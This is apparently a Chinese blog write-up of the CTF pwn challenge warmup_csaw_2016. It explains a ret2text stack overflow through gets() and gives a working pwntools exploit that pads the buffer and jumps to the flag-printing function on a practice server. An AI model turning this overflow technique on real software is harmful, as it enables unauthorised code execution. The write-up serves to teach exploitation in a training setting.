003-warmup_csaw_2016

考点:ret2text

查看源代码

分析:倘若我们能控制执行流到sub_40060D()函数中,就可以打印出flag,而源代码中有危险函数gets()

003-warmup_csaw_2016

EXP

sub_40060D()函数的地址程序自己提供,且为固定的

003-warmup_csaw_2016

from pwn import *
context.arch = ‘amd64‘
#sh = process("./003-warmup_csaw_2016")
sh = remote("node4.buuoj.cn", 29898)
sys_addr = 0x40060d

sh.recv()
payload = flat(cyclic(0x40 + 8), sys_addr)
sh.send(payload)
sh.interactive()

003-warmup_csaw_2016

003-warmup_csaw_2016

上一篇:Docker Compose


下一篇:【hadoop出口计算】trino(presto)+clickhouse